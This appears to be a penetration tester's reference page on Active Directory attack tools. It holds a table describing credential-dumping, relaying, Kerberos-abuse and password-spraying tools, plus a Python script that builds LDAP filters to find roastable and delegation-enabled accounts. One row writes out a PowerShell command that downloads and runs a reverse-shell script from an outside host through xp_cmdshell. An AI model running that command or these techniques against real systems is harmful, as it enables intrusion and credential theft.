toolkit

Different precompiled .NET tools: https://github.com/jakobfriedl/precompiled-binaries/tree/main

| Tool | Description |
|---|---|
| PowerView/SharpView | A PowerShell tool and a .NET port of the same used to gain situational awareness in AD. These tools can be used as replacements for various Windows net* commands and more. PowerView and SharpView can help us gather much of the data that BloodHound does, but it requires more work to make meaningful relationships among all of the data points. These tools are great for checking what additional access we may have with a new set of credentials, targeting specific users or computers, or finding some "quick wins" such as users that can be attacked via Kerberoasting or ASREPRoasting. |
| pywerview | A (partial) Python rewriting of PowerSploit's PowerView. |
| PowerView.py | A Python alternative to the original PowerView.ps1 script. |
| BloodHound | Used to visually map out AD relationships and help plan attack paths that may otherwise go unnoticed. Uses the SharpHound PowerShell or C# ingestor to gather data to later be imported into the BloodHound JavaScript (Electron) application with a Neo4j database for graphical analysis of the AD environment. |
| SharpHound | The C# data collector to gather information from Active Directory about varying AD objects such as users, groups, computers, ACLs, GPOs, user and computer attributes, user sessions, and more. The tool produces JSON files which can then be ingested into the BloodHound GUI tool for analysis. |
| BloodHound.py | A Python-based BloodHound ingestor based on the Impacket toolkit. It supports most BloodHound collection methods and can be run from a non-domain joined attack box. The output can be ingested into the BloodHound GUI for analysis. |
| Kerbrute | A tool written in Go that uses Kerberos Pre-Authentication to enumerate Active Directory accounts and perform password spraying and brute forcing. |
| Impacket toolkit | A collection of tools written in Python for interacting with network protocols. The suite of tools contains various scripts for enumerating and attacking Active Directory. |
| Responder | A purpose-built tool to poison LLMNR, NBT-NS and mDNS name resolution and capture the NetNTLM authentication attempts of hosts that accept the poisoned answers; it has many other functions (rogue SMB, HTTP, LDAP and other servers). |
| Inveigh.ps1 | Similar to Responder, a PowerShell tool for performing various network spoofing and poisoning attacks. |
| C# Inveigh (InveighZero) | The C# version of Inveigh, with a semi-interactive console for interacting with captured data such as usernames and password hashes. |
| rpcclient | A part of the Samba suite on Linux distributions that can be used to perform a variety of Active Directory enumeration tasks via the remote RPC service. |
| CrackMapExec (CME) | CME is an enumeration, attack, and post-exploitation toolkit which can help us greatly in enumeration and performing attacks with the data we gather. CME attempts to "live off the land" and abuse built-in AD features and protocols such as SMB, WMI, WinRM, and MSSQL. |
| NetExec | The actively maintained community fork of CrackMapExec (same workflow and protocol modules); new development happens here rather than in CME. |
| Rubeus | A C# toolset for raw Kerberos interaction and abuse: ticket requests and renewals, Kerberoasting, AS-REP roasting, pass-the-ticket, overpass-the-hash and delegation abuse. |
| GetUserSPNs.py | Another Impacket module geared towards finding Service Principal names tied to normal users. |
| Hashcat | A great hash-cracking and password recovery tool. |
| enum4linux | A tool for enumerating information from Windows and Samba systems. |
| enum4linux-ng | A rework of the original Enum4linux tool that works a bit differently. |
| ldapsearch | Built-in (OpenLDAP) command-line client for querying directories over the LDAP protocol; reference: https://malicious.link/posts/2022/ldapsearch-reference/ |
| windapsearch | A Python script used to enumerate AD users, groups, and computers using LDAP queries. Useful for automating custom LDAP queries. |
| DomainPasswordSpray.ps1 | DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. |
| ‣ | Password spraying attack against all users of a domain using LDAP. |
| LAPSToolkit | The toolkit includes functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). |
| ‣ | Dumping LAPS from Python |
| ‣ | Retrieve LAPS password from LDAP |
| smbmap | SMB share enumeration across a domain. |
| psexec.py | Part of the Impacket toolset, it provides us with psexec like functionality in the form of a semi-interactive shell. |
| wmiexec.py | Part of Impacket toolset, it provides the capability of command execution over WMI. |
| Snaffler | Useful for finding information (such as credentials) in Active Directory on computers with accessible file shares. |
| smbserver.py | Simple SMB server execution for interaction with Windows hosts. Easy way to transfer files within a network. |
| setspn.exe | Reads, modifies, and deletes the Service Principal Names (SPN) directory property for an Active Directory service account. |
| Mimikatz | Performs many functions. Notably, pass-the-hash attacks, extracting plaintext passwords, and Kerberos ticket extraction from memory on a host. |
| secretsdump.py | Remotely dump SAM and LSA secrets from a host. |
| evil-winrm | Provides an interactive shell on a host over the WinRM protocol. |
| PowerUpSQL | A PowerShell toolkit for SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution. It is intended for internal penetration tests and red team engagements, but also includes functions administrators can use to quickly inventory the SQL Servers in their AD domain and perform common SQL Server threat-hunting tasks. |
| mssqlclient.py | Part of Impacket toolset, it provides the ability to interact with MSSQL databases. |
| SQLRecon | Used to enumerate MSSQL servers within a network. |
| mssql_shell | Drops straight into a shell on an MSSQL server; if the user you have does not work, try the default `sa` account. |
| mssqlproxy | Toolkit for lateral movement through a compromised MSSQL server (tunnels a SOCKS proxy over the existing SQL connection). Clone the python3 branch: `git clone xxxx -b python3` |
| ‣ | Interact with and exploit MSSQL servers. |
| Invoke-SQLOSCmd | PowerUpSQL function that runs an OS command on the SQL host through xp_cmdshell (requires sysadmin; it enables xp_cmdshell if it is off). Useful to trigger a reverse shell, e.g. `Invoke-SQLOSCmd -Verbose -Instance devsrv.garrison.castle.local -Command "powershell iex(New-Object Net.WebClient).DownloadString('http://[REDACTED]/Invoke-PowerShellTcp.ps1')"` |
| noPac.py | Exploit combo using CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user. |
| rpcdump.py | Part of the Impacket toolset, RPC endpoint mapper. |
| CVE-2021-1675.py | PrintNightmare PoC in Python. |
| ntlmrelayx.py | Part of the Impacket toolset, it performs NTLM relay attacks: authentication captured over SMB or HTTP is relayed to SMB, LDAP, HTTP, MSSQL and other targets. |
| NtlmThief ‣ | Extracts NetNTLM hashes without touching lsass.exe. A C++ implementation of the Internal Monologue attack: it obtains NetNTLM responses for logged-on users through SSPI. |
| PetitPotam.py | PoC tool for CVE-2021-36942 to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions. |
| gettgtpkinit.py | Part of PKINITtools; requests a TGT over PKINIT using a certificate and private key (for example one obtained through ADCS abuse) and saves the AS-REP encryption key for later use by getnthash.py. |
| getnthash.py | This tool will use an existing TGT to request a PAC for the current user using U2U. |
| adidnsdump | A tool for enumeration and dumping of DNS records from a domain. Similar to performing a DNS Zone transfer. |
| gpp-decrypt | Decrypts the cpassword values stored in Group Policy Preferences XML files (Groups.xml and friends) with the AES key Microsoft published, recovering the usernames and passwords. |
| GetNPUsers.py | Attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set. |
| lookupsid.py | SID bruteforcing tool. |
| ticketer.py | A tool for creation and customization of TGT/TGS tickets. |
| raiseChild.py | Part of the Impacket toolset, it is a tool for child-to-parent domain privilege escalation. |
| Active Directory Explorer | Active Directory Explorer (AD Explorer) is an AD viewer and editor. It can be used to navigate an AD database and view object properties and attributes. It can also be used to save a snapshot of an AD database for off-line analysis. When an AD snapshot is loaded, it can be explored as a live version of the database. It can also be used to compare two AD database snapshots to see changes in objects, attributes, and security permissions. |
| PingCastle | Used for auditing the security level of an AD environment based on a risk assessment and maturity framework (based on CMMI adapted to AD security). |
| Group3r | Group3r is useful for auditing and finding security misconfigurations in AD Group Policy Objects (GPO). |
| ADRecon | A tool used to extract various data from a target AD environment. The data can be output in Microsoft Excel format with summary views and analysis to assist with analysis and paint a picture of the environment's overall security state. |
| SharpGPOAbuse | Takes advantage of GPO edit rights: once a GPO we can modify applies to a target host, it can add a user we control to the local Administrators group on that host, create an immediate scheduled task on it to give us a reverse shell, or configure a malicious computer startup script for the same purpose. |
| LaZagne | Tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more. |
| SessionGopher | SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. |
| ‣ | LSASS |
| ‣ | Uses cloned handles to LSASS (instead of opening a new one) to create an obfuscated memory dump of the process. |
| ‣ | Exports a username list for the domain (or for a target mailbox) by dumping the Global Address List. |
| MailSniper | Searches through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.) that may be used to find sensitive data such as credentials for lateral movement and privilege escalation. It can be run as a non-administrative user to search that user's own mailbox, or by an Exchange administrator to search the mailboxes of every user in the domain. It can also be used for password spraying, enumerating domain users/domains, checking mailbox permissions, and gathering the Global Address List (GAL) from Outlook Web Access (OWA) and Exchange Web Services (EWS). |
| spray | A password spraying tool for Active Directory credentials: SMB, OWA, Lync, Cisco Web VPN, OpenVPN Web Portal. |
| ruler | Interacts with Exchange servers remotely through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is to abuse client-side Outlook features and gain a shell remotely. Functions:
• Password spray
• Enumerate valid users
• Create new malicious mail rules
• Dump the Global Address List (GAL) |
| ntlmscan | Scans for web endpoints ("NTLM directories") that accept NTLM authentication, against a single URL or a whole host, and can additionally enumerate virtual hosts. Reliable targets are:
• OWA servers
• Skype for Business/Lync servers
• Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
• ADFS servers |
| Coercer | automatically coerce a Windows server to authenticate on an arbitrary machine through many methods. |
| pywhisker | Manipulates the msDS-KeyCredentialLink attribute of a target user or computer (Shadow Credentials) so that we can authenticate as that object with a certificate, which amounts to full control over it. |
| ‣ | Prints "kerberoast" hashes for user accounts that have an SPN set. |
| krbrelayx | Kerberos relaying and unconstrained delegation abuse toolkit. |
| ScriptSentry | ScriptSentry finds misconfigured and dangerous logon scripts. |
| LDAPmonitor | Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration, e.g. `python3 LDAPmonitor/python/pyLDAPmonitor.py -d HTB.LOCAL -u henry.vinson --no-pass -k --dc-ip $IPv6` |
| ADExplorerSnapshot ‣ | ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON. |
| DCOMrade | DCOMrade is a PowerShell script that enumerates potentially vulnerable DCOM applications that might allow lateral movement, code execution, data exfiltration, etc. |
| pandora ‣ | A red team tool that assists in extracting/dumping master credentials and/or entries from different password managers. They are separated into three categories: Windows 10 desktop applications, browsers, and browser plugins. This may work on other OSes, like Linux, but it is not tested yet. In this release (v1.0), the tool supports 14 password managers, with 18 different implementations (e.g., the tool can dump credentials either from the desktop app or from the browser plugin of the same product). In most cases, the password manager must be running and unlocked for the tool to work.
The tool can be executed in Full, Fast, and Local modes. Full mode dumps and checks all processes of the password manager. Fast mode checks only the most common process that usually contains the credentials. Local mode checks a dump file locally; it also has a "merge" option that combines multiple dump files into one before the analysis. Additionally, the tool can check whether a password manager's directory exists, to help identify which password managers are present on the host. Ordinary user permissions are enough to dump a password manager process; only the 1Password desktop app requires high-integrity privileges for the dump. |
| Seatbelt ‣ | Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. |
| PowerSharpPack ‣ | Offensive C# projects (Rubeus, Seatbelt, SharpHound and others) wrapped into PowerShell scripts that load the assembly from memory; commonly used for AV evasion. |
| ‣ | A pure-Python alternative to Mimikatz's DCShadow technique. |
| AccessChk | Sysinternals tool that shows what kind of access specific users or groups have to resources, including files, directories, registry keys, global objects and Windows services. |
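The "quick wins" several rows above describe (PowerView/SharpView, windapsearch, GetUserSPNs.py, GetNPUsers.py) all reduce to a handful of LDAP filters plus bit tests on userAccountControl. The block below is an added example written for this page, not code from any of the tools listed: it builds those filters with RFC 4515 escaping (so a name taken from a wordlist or a form cannot rewrite the filter), then applies the same conditions offline to constructed sample entries. Function names, the sample accounts, SPNs and hostnames are all made up; only the userAccountControl flag values and the matching-rule OID are real.

```python
"""Offline model of the 'quick win' LDAP enumeration that PowerView and
windapsearch automate. Added example for this page; not code from any of the
listed tools. Nothing is sent to a DC: SAMPLE_ENTRIES is constructed to look
like LDAP search results so the logic can be run and checked offline."""
from __future__ import annotations

# userAccountControl bit flags (values from [MS-ADTS] / [MS-SAMR]).
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_WORKSTATION_TRUST_ACCOUNT = 0x1000
UAC_SERVER_TRUST_ACCOUNT = 0x2000               # domain controllers
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UAC_DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained, "any protocol"

# Extensible-match rule for a bitwise AND on an integer attribute; this is
# what (userAccountControl:1.2.840.113556.1.4.803:=N) means in a filter.
BIT_AND = "1.2.840.113556.1.4.803"


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping for a value interpolated into a filter.

    Without it, a sAMAccountName such as 'a)(objectClass=*' taken from user
    input changes the structure of the filter (LDAP filter injection)."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def uac_clause(flag: int, present: bool = True) -> str:
    clause = f"(userAccountControl:{BIT_AND}:={flag})"
    return clause if present else f"(!{clause})"


# user objects (objectCategory=person excludes computers) that are not disabled
ENABLED_USER = "(objectCategory=person)(objectClass=user)" + uac_clause(UAC_ACCOUNTDISABLE, False)


def build_filter(kind: str, sam: str | None = None) -> str:
    """The filter each 'quick win' enumeration sends to the DC."""
    if kind == "kerberoastable":
        # krbtgt has an SPN too, but its key is random and will not crack
        return f"(&{ENABLED_USER}(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))"
    if kind == "asreproastable":
        return f"(&{ENABLED_USER}{uac_clause(UAC_DONT_REQ_PREAUTH)})"
    if kind == "unconstrained":
        # computer derives from user, so objectClass=user covers both kinds
        return f"(&(objectClass=user){uac_clause(UAC_TRUSTED_FOR_DELEGATION)})"
    if kind == "user":
        if sam is None:
            raise ValueError("sam is required for kind='user'")
        return f"(&(objectClass=user)(sAMAccountName={ldap_escape(sam)}))"
    raise ValueError(f"unknown kind {kind!r}")


def classify_account(entry: dict) -> list[str]:
    """Apply the same conditions to one already-fetched LDAP entry."""
    uac = int(entry.get("userAccountControl", 0))
    if uac & UAC_ACCOUNTDISABLE:
        return ["disabled"]
    tags: list[str] = []
    is_computer = "computer" in entry.get("objectClass", [])
    has_spn = bool(entry.get("servicePrincipalName"))
    if has_spn and not is_computer and entry.get("sAMAccountName") != "krbtgt":
        tags.append("kerberoastable")
    if uac & UAC_DONT_REQ_PREAUTH:
        tags.append("asreproastable")
    if uac & UAC_TRUSTED_FOR_DELEGATION:
        tags.append("unconstrained-delegation")
    if entry.get("msDS-AllowedToDelegateTo"):   # constrained delegation targets
        proto = "any-protocol" if uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION else "kerberos-only"
        tags.append(f"constrained-delegation:{proto}")
    return tags


def quick_wins(entries: list[dict]) -> dict[str, list[str]]:
    """Group account names by finding, like a PowerView one-liner would."""
    found: dict[str, list[str]] = {}
    for e in entries:
        for tag in classify_account(e):
            found.setdefault(tag, []).append(e["sAMAccountName"])
    return found


USER_CLASSES = ["top", "person", "organizationalPerson", "user"]

# Constructed sample data resembling what ldapsearch/windapsearch return.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_sql", "objectClass": USER_CLASSES,
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_EXPIRE_PASSWORD,        # 66048
     "servicePrincipalName": ["MSSQLSvc/devsrv.garrison.castle.local:1433"]},
    {"sAMAccountName": "legacy.app", "objectClass": USER_CLASSES,
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH},            # 4194816
    {"sAMAccountName": "krbtgt", "objectClass": USER_CLASSES,
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE,               # 514
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "DC01$", "objectClass": USER_CLASSES + ["computer"],
     "userAccountControl": UAC_SERVER_TRUST_ACCOUNT | UAC_TRUSTED_FOR_DELEGATION,  # 532480
     "servicePrincipalName": ["HOST/DC01", "ldap/DC01.garrison.castle.local"]},
    {"sAMAccountName": "svc_web", "objectClass": USER_CLASSES,
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_TRUSTED_TO_AUTH_FOR_DELEGATION,  # 16777728
     "servicePrincipalName": ["HTTP/web.garrison.castle.local"],
     "msDS-AllowedToDelegateTo": ["cifs/fileserver.garrison.castle.local"]},
]

if __name__ == "__main__":
    for kind in ("kerberoastable", "asreproastable", "unconstrained"):
        print(kind, build_filter(kind))
    print(build_filter("user", "a)(objectClass=*"))   # escaped, not injected
    print(quick_wins(SAMPLE_ENTRIES))
```

The printed filters can be pasted straight into `ldapsearch -LLL ... '<filter>' sAMAccountName servicePrincipalName userAccountControl`. The bitwise matching rule is the detail people get wrong by hand: userAccountControl is a bitmask, so an equality test such as `(userAccountControl=4194304)` only matches accounts with no other flag set and silently misses most AS-REP roastable users; the `:1.2.840.113556.1.4.803:=` form matches any account that has the bit.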

[ldapsearch](https://verbose-butter-fad.notion.site/ldapsearch-241572b769db81519474c691cb615560)